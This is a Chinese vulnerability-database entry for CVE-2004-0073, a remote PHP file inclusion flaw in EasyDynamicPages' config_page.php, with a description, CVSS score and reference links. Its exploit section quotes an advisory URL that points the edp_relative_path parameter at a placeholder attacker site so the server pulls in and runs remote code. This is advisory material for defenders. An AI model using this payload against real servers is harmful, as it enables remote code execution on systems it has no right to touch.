EasyDynamicPages config_page.php远程PHP文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107611 漏洞类型 未知
发布时间 2004-01-02 更新时间 2006-09-28
CVE编号 CVE-2004-0073 CNNVD-ID CNNVD-200402-065
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23507
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200402-065
|漏洞详情
EasyDynamicPages是一款方便构建动态页面的脚本系统。EasyDynamicPages配置文件对用户提交的URI参数缺少充分过滤,远程攻击者可以利用这个漏洞包含远程文件,以WEB进程权限在系统上执行任意命令。问题存在于'/admin/config.php'文件中:++++++++++++++++++++++++include_once$edp_relative_path."admin/serverdata.php";++++++++++++++++++++++++由于对$edp_relative_path变量缺少充分过滤,攻击者可以指定包含远程服务器上的恶意PHP文件作为包含文件,以WEB进程权限在系统上执行文件中的任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/9338/info

EasyDynamicPages is prone to a remote file include vulnerability in a configuration script. This will permit a remote attack to include malicious PHP scripts from remote servers, which will then be executed by the web server hosting the vulnerable software. 

http://www.example.com/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://[attacker's_site]/

The attacker must have a malicious script hosted at the following location:

http://[attacker's_site]/admin/site_settings.php
|参考资料

来源:BID
名称:9338
链接:http://www.securityfocus.com/bid/9338
来源:XF
名称:easydynamicpages-php-file-include(14136)
链接:http://xforce.iss.net/xforce/xfdb/14136
来源:OSVDB
名称:3408
链接:http://www.osvdb.org/3408
来源:OSVDB
名称:3318
链接:http://www.osvdb.org/3318
来源:SECTRACK
名称:1008584
链接:http://securitytracker.com/id?1008584
来源:SECUNIA
名称:10535
链接:http://secunia.com/advisories/10535
来源:BUGTRAQ
名称:20040102include()vulninEasyDynamicPagesv.2.0
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107307457327707&w=2